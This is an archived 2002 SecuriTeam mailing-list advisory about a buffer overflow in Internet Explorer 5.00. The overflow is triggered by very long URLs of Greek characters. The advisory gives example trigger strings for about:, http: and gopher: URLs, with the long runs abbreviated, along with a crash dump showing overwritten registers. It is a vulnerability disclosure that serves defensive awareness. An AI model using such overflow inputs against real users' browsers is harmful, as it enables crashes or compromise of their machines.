[NT] MSIE URL Buffer Overflow using Greek Characters
From: support@securiteam.comDate: 04/17/02
- Previous message: support@securiteam.com: "[UNIX] Multiple Vulnerabilities in PostBoard"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Wed, 17 Apr 2002 12:11:08 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
MSIE URL Buffer Overflow using Greek Characters
------------------------------------------------------------------------
SUMMARY
A security vulnerability in Internet Explorer has been found, that allows
remote attackers to overflow internal buffers used by the program allowing
them to overwrite system registers. This could be used to compromise a
remote client, by simply redirecting him to a malicious URL.
DETAILS
Vulnerable systems:
* Internet Explorer version 5.00
Example:
about:ááááááááááááááááááááááááá[2.041 GREEK CHARS]ââââââââââââââââââá
http://áááááááááááááááááááááááááááááâââââââââââ[2.041 GREEK CHARS]äááá
gopher://áááááááááááááááááá[2.041 GREEK CHARS]ááääääääääääääóóóóóóóååå
When IE crashes, the following error will appear:
=========================================
IEXPLORE caused an invalid page fault in module BROWSEUI.DLL at
015f:710283c0.
Registers:
EAX=cececece CS=015f EIP=710283c0 EFLGS=00010282
EBX=00000000 SS=0167 ESP=0058a054 EBP=0058bce0
ECX=817364ec DS=0167 ESI=0058b8d0 FS=3897
EDX=00000000 ES=0167 EDI=00000000 GS=0000
Bytes at CS:EIP:
ff 70 08 ff 75 0c ff 15 a0 14 02 71 89 5d f8 8d
Stack dump:
cececece 00421464 00420858 00000000 00620061 0075006f 003a0074 00b100ce
00b100ce 00b100ce 00b100ce 00b100ce 00b100ce 00b100ce 00b100ce 00b100ce
=========================================
ADDITIONAL INFORMATION
The information has been provided by <mailto:admin@cyhackportal.com>
MegaHz.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Multiple Vulnerabilities in PostBoard"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
